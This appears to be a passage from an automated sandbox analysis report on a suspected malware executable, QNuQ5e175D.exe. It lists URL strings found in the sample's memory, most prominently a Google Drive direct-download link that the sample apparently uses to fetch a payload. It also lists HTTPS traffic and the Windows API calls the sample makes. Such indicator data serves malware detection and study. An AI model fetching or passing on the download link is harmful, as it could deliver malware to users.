https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadf
      Source: QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadgc
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadgl
      Source: QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadid
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadof
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadom
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadoo
      Source: QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadt
      Source: QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadwb
      Source: QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download~
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, 
QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknown | Network traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknown | Network traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknown | Network traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknown | Network traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknown | Network traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknown | Network traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknown | Network traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknown | Network traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49805 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49886 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49968 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50014 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50016 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50018 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50020 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:50021 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50022 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50024 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50026 version: TLS 1.2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
